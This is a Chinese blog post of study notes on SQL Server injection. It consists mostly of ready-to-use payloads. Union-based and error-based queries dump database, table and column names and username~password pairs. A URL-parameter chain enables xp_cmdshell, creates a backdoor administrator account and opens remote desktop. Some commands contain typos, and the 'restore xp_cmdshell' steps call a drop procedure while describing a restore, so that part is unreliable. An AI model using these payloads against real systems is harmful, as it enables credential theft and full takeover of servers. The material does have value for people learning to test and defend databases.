SQLsever注入

最新推荐文章于 2024-07-23 22:14:51 发布
最新推荐文章于 2024-07-23 22:14:51 发布
阅读量300 收藏 2
点赞数
分类专栏: 安全 sql注入 web渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47081872/article/details/108835664
版权
安全 同时被 3 个专栏收录
3 篇文章 0 订阅
订阅专栏
sql注入
2 篇文章 0 订阅
订阅专栏
web渗透
2 篇文章 0 订阅
订阅专栏

SQLsever注入

一、系统库
1.master:控制SQL server的所有方面,该数据库中包含所有的配置信息、用户登录信息等等
2.model:建立所有数据的的模板,默认没有数据表
3.tempdb:供所有来访问SQL server的用户使用,这个库用来保存所有的临时表、存储过程和其他SQL server建立的临时用的东西;每次SQL server重新启动,他都会清空tempdb数据库并重建,默认没有数据表
4.msdb:所有的任务调度、报警、操作员都存储在该数据库中,该库的另一个功能是用来存储所有备份历史

二、SQLsever基础
1.注释符号
单行注释:–
多行注释:/**/
2.常用函数
@@version:数据库版本
db_name():当前数据库名
user:当前书库据的所有者,dbo是每个数据库的默认用户,即databaseower
suser_name():当前登陆数据库的真实用户
substr():按要求截取字符串
ascii():查询指定字符串的acsii码
len():查看指定字符串的长度
count():返回要铲鲟数据的数量

三、手工注入
1.联合查询
判断注入点
order by n 查看字段数量
union select NULL,NULL,NULL; 判断显示位
select count(name) from sys.sysdatabases; 查询数据库数量
select top 1 name from sys.sysdatabases; 查询第一个数据库名字
select top 1 name from sys.sysdatabases where name !=‘master’; 查询第二个数据库名字
select top 1 name from sys.sysdatabases where name !=‘master’ and name !=’’ and name !=’’ …; 依次类推查询其他数据库名
select count(name) from sysobjects where xtype =‘u’; 查询表的数量
select top 1 name from sysobjects where xtype =‘u’; 查询第一个表单名字
select top 1 name from sysobjects where xtype =‘u’ and name !=‘users’ and name !=’’ …; 依次类推查询其他的表名
select count(name) from sys.syscloumns where id = OBJECT_ID(‘users’); 查询字段数量
select top 1 name from sys.syscolumns where id = OBJECT_ID(‘users’); 查询第一个字段名
select top 1 name from sys.syscolumns where id = OBJECT_ID(‘users’) and name !=‘id’ and name !=’**’; 依次查询其他的字段名
select count(username+’~’+password) from users; 查看当前数据库数量
select top 1 username+‘~’+password from users where id =‘1’; 查询第一条数据
select top 1 usename+‘~’+password from users where id =‘1’ and usernam !=’’ and usersname !=’*’ 依次类推查询其他数据
或者先查用户在查密码
select count(name) from test.sys.sysobjects where xtype = ‘u’; 对其他数据库的表进行查询
2.报错查询(联合查询依次查询每一条数据的方式报错也能用,报错注入不能查询数量)
判断注入点
and 1=convert(int,db_name);查询当前数据库
and 1=covert(int,(select name from sys.sysdatabases));查询当所有数据库
and 1=convert(int,(select top 1 name from sys.sysdatabases));查询第一个数据库名
and 1=convert(int,(select top 1 name from sysobjects where xtype=‘u’));查询第一个数据表的名称
and 1=convert(int,(select top 1 name from sys.syscolumns where ID=OBJECT_ID(‘users’)));查询第一个字段名
and 1=convert(int,(select top 1 username+’~’+password from users)) 查询第一条数据

四、SQLsever权限问题
1.固定的角色服务器
sysadmin:可以在 SQL Server 中执行任何活动
serveradmin:可以设置服务器范围的配置选项,关闭服务器
setupadmin:setupadmin: 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_serveroption)
securityadmin:可以管理登录和CREATE、DATABASE权限,还可以读取错误日志和更改密码
processadmin:processadmin :可以管理在 SQL Server 实例中运行的进程
dbcreator :可以创建、更改和除去数据库。
diskadmin:可以管理磁盘文件
bulkadmin :可以执行 BULK INSERT 语句
2.固定数据库的角色
db_owner :在数据库中有全部权限
db_accessadmin :可以添加或删除用户 ID
db_securityadmin :可以管理全部权限、对象所有权、角色和角色成员资格
db_ddladmin:可以发出ALL DDL,但不能发出GRANT、REVOKE或DENY语句
db_backupoperator :可以发出 DBCC、CHECKPOINT 和 BACKUP 语句
db_datareader:可以选择数据库内任何用户表中的所有数据
db_datawriter:可以更改数据库内任何用户表中的所有数据
db_denydatareader :不能选择数据库内任何用户表中的任何数据
db_denydatawriter:不能更改数据库内任何用户表中的任何数据
3.攻击常用的扩展模块
xp_cmdshell:利用此存储过程可以直接执行系统命令
xp_regread:利用此存储过程可以进行注册表读取
xp_regwrit:利用此存储过程可以写入注册表
xp_dirtre:利用此存储过程可以进行列目录操作
xp_enumds:利用此存储过程可以进行ODBC连接
xp_loginconfig:利用此存储过程可以配置服务器安全模式信息
xp_makecab:利用此存储过程可以创建压缩卷
xp_ntsec_enumdomains:利用此存储过程可以查看domain信息
xp_terminate_jroces :利用此存储过程可以查看终端进程,给出一个进程PID
4.利用SQLsever(xp_cmdshell)扩展储存过程获取getshell
?id=1;use master;切换到master数据库
?id=1;exec sp_configure ‘show advanced options’,1;reconfigure; 开启高级功能重载配置文件
?id=1;exec sp_configure ‘xp_cmdshell’,1;reconfigure; 开启cmd_expshell功能并且重载配置文件
?id=1;exec master…xp_cmdshell “net user huokai 123.com /add”; 创建用户
?id=1;exec master…xp_cmdshell “net localgroup Administrators huokai /add”; 将用户移入到管理员组
?id=1;exec master…xp_cmdshell ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f’; 开启3389端口
7.使用mstsc(远程桌面)进行远程连接
5.关闭开启此功能
关闭
exec sp_configure ‘xp_cmdshell’,0; 关闭高级功能重载配置文件
reconfigure;
exec sp_configure ‘show advanced options’,0; 关闭cmd_expshell功能并且重载配置文件
reconfigure;
开启
use master;
exec sp_configure ‘show advanced options’,1;开启高级功能重载配置文件
reconfigure;
exec sp_configure ‘xp_cmdshell’,1; 开启cmd_expshell功能并且重载配置文件
reconfigure;
6.检测与恢复扩展储存
提交如下查询进行检测,可查看xp_cmdshell扩展存储过程是否被删除。
and 1=(Select count(*) FROM master. dbo.sysobjects Where name = ‘xp_cmdshell’)
如果扩展存储被删除,可执行如下查询进行恢复。
;exec sp_dropextendedproc ‘xp_cmdshell‘
上面这条查询语句,是在恢复前先删除xp_cmdshell,以后再在后面重新进行创建,然后执行如下查询。
;exec sp_dropextendedproc ‘xp_cmdshell’,'xplog70.dll’
该语句是利用系统中默认的“xplog70.dll”文件,自动恢复xp_cmdshell,如果恢复不成功,说明该文件被改名或删除,可以上传一个“xplog70.dll”文件,自定义路径进行恢复。例如,执行如下查询语句。
;exec sp_dropextendedproc ‘xp_cmdshell’,‘c:\xplog70.dll’

技术小白痴
关注
专栏目录
SQL server注入
weixin_45958861的博客
09-20 1593
较为复杂 一般不用手工 用工具 1.注入语句 ①*判断数据库类型 and exists (select * from sysobjects)–返回正常为mssql(也名sql server) and exists (select count() from sysobjects)–有时上面那个语句不行就试试这个哈 ②判断数据库版本 and 1=@@version–这个语句要在有回显的模式下才可以哦 and substring((select @@version),22,4)=‘2008’–适用
三步堵死 SQL Server注入漏洞
09-11
三步堵死 SQL Server 注入漏洞 SQL Server 注入漏洞是一种常见的 Web 应用程序安全漏洞,攻击者可以通过构造恶意的 SQL 语句来获取或修改数据库中的数据,以获取未经授权的访问权限。为防止 SQL Server 注入漏洞,...
2004-8-5+ 给mssql添加用户
weixin_34113237的博客
06-29 101
打开管理器,找到需要添加用户的数据库,点开,右键单击用户,选择“新建数据库用户”,弹出“数据库用户属性-新建用户”,填好登陆名和用户名,分配好角色,然后就可以啦。先看登陆名。一般从下拉列表里选“新建”,跳出“sql server登录属性-新建登录”,然后在这里填名称,设定sel servr身份验证的密码,然后从下拉列表里选一个数据库,就是你要添加用户的那个,完事后确定。这样在登陆名下拉列表就会多出...
SQL注入SQL注入漏洞的检测及防御,零基础入门到精通
最新发布
baimao__Ch的博客
07-23 1215
SQL注入SQL Injection)是一种广泛存在于Web应用程序中的严重安全漏洞,它允许攻击者在不得到授权的情况下访问、修改或删除数据库中的数据。这是一种常见的攻击方式,因此数据库开发者、Web开发者和安全专业人员需要了解它,以采取措施来预防和检测SQL注入漏洞。01什么是SQL注入SQL注入是一种攻击技术,攻击者通过在输入字段中插入恶意SQL代码,试图欺骗应用程序以执行不安全的数据库操作。这些恶意SQL代码将与应用程序的数据库进行交互,允许攻击者执行未授权的操作。
SQL Server 注入
mingyqf的博客
03-22 2461
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
SQL Server注入
weixin_34129145的博客
11-05 89
1.利用错误消息提取信息 1.1 枚举当前表与列 select * from users where username='root' and password='root' having 1=1--' 抛出错误:选择列表中的列 'users.id' 无效,因为该列没有包含在聚合函数或 GROUP BY 子句中。   发现表名为 'users',存在列名为 'id' sele...
桂林老兵的SQLSERVER高级注入技巧
12-13 1092
现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友:前言:即是高级技巧,其它基本的注入方法就不详述了。看不懂可查本站的注入基础文章。为了更好的用好注入,建议大家看看本站的SQL语法相关文章[获取全部数据库名]select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库[获得数据表名][将字段值
SQLServer注入程序Delphi无控件版
05-18
内容索引:Delphi源码,数据库应用,注入 SQLServer注入程序Delphi无控件版,对"asp?id=169"如果169为文字型,也可注入,而且 程序没有使用三方控件,方便编译,使用时请按照获取[SQL Server信息]、[获取表名]、[获取...
SQLServer注入程序Delphi无控件版..rar
05-04
标题中的"SQLServer注入程序Delphi无控件版"指的是使用Delphi编程语言开发的一款针对Microsoft SQL Server数据库的SQL注入工具。SQL注入是一种常见的安全漏洞,攻击者通过输入恶意的SQL语句来获取、修改、删除数据库...
SQL注入-基于MSsql(sql server)的注入
LJH1999ZN的博客
02-13 5900
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库的注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
SQL Server注入大全及防御
网络 人生 学习 进步
09-17 1441
  SQL Server是中小型网站广泛使用的数据库,由于功能强大也滋生了很多安全问题,国内又因为SQL注入攻击的很长一段时间流行,导致对SQL Server的入侵技巧也层出不穷,由于SQL Server支持多语句,相信很多小黑在对SQL Server进去SQL注入的时候很少使用猜解表名之类的方法,而直接转向使用SQL Server的存储过程和函数快速的拿权限,下面我就围绕SQL Server的系
Sql server之sql注入
12-14
SQL Injection   关于sql注入的危害在这里不多做介绍了,相信大家也知道其中的厉害关系。这里有一些sql注入的事件大家感兴趣可以看一下   防范sql注入的方法无非有以下几种:   1.使用类型安全SQL参数   2.使用参数化输入存储过程   3.使用参数集合与动态SQL   4.输入滤波   5.过滤LIKE条款的特殊字符   …如果有遗漏的也欢迎园子的大大们指教。   Sample:   var Shipcity;   ShipCity = Request.form ("ShipCity");   var sql = "select * from
SQL server 中的SQL 注入
d1996a的博客
09-27 408
SQL server 中的sql注入 实验环境: 在windows server 2008虚拟机中安装SQL server 数据库。安装phpstudy ,通过一台Windows7 访问连接windows server 2008. SQL server 联合注入 首先判断注入点,输入id=1,页面正常回显。 首先判断是否是数值型: id=1 and 1=1,页面正常回显 id=1 and 1=2,页面空显示,可以判断是数值型。 因为有显示位,可以用联合注入进行注入。 首先判断显示位,由此可以看出显示位
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell
m0_67844671的博客
10-02 2493
【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-CSDN博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
SQL Server手工注入方式
内心不种满鲜花就会长满杂草
01-04 6093
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
1、sql server数据库进行sql注入
weixin_51520483的博客
05-15 986
1、判断数据类型是很重要的一点,影响后面的注入语句2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形。
SQL-Server注入
qq_41781465的博客
08-17 151
col_name():可以根据id值得到对像的名称,而且可以返回指定下标的结果 ————————————————————object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的。特性:union all select 联合查询要加all。记录了数据库中所有表的字段,常⽤字段为id、name和xtype。object_id(name)可以根据表对象名称得到表对象的ID,:记录了数据库中所有表,常⽤字段为id、name和xtype。@@version 版本。
sqlserver注入
hellodaoyan的博客
12-11 248
管理员账号叫 sa 允许外网链接 可以爆破8可以打开3 3不能打开8直接备份和删除很麻烦 需要先分离在这个目录sa账号能不用就不用。
专门针对SQL Server的注入手段
Wayne_Deng的专栏
07-13 1300
小弟潜心研究sql injection一个余月,发现国内存在sql injection漏洞的网站一大把一大把,80%以上的asp网站都似乎是不学无术、骗吃骗喝的“程序员”所做。不光漏洞多,而且网站内部结构也是零乱无比…… 关于sql injection网上流传甚广的SQL注入天书可以说是非常不错的入门介绍了,在这里也要重复一些老套的手法。 首先上手的都是1=1,1=2的方法测试验证漏洞,字符则用
微软SQL Server 注入攻击技术详解
SQL Server 注入攻击 SQL Server 注入攻击是一种常见的 Web 应用安全漏洞,攻击者可以通过在 Web 应用程序的输入参数中注入恶意 SQL 语句,以达到非法访问或控制数据库的目的。 **什么是 SQL Server 注入攻击?** ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值